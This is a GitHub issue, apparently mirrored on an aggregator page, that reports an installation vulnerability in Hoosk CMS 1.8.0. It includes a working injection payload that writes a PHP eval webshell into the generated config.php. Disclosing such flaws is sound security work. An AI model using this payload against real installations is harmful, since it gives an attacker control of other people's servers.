havok89 / Hoosk

Hoosk Codeigniter CMS

Home Page:http://hoosk.org

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

There are vulnerabilities in the program installation, which can cause hackers to obtain server permissions

ch0x01e opened this issue · comments

commented

There are vulnerabilities in program V1.8.0
The vulnerability is located in the image below
image
The loophole is in these two parameters, which can be written directly to the Webshell at installation time by constructing a specific payload
payload:test.com');eval($_POST['a']);//
After payload is written, a config.php file is automatically generated. The parentheses close and the webshell can be accessed
a7c9f2e232d3f889dcf94490f1bbcb87
The following figure shows the webshell result
image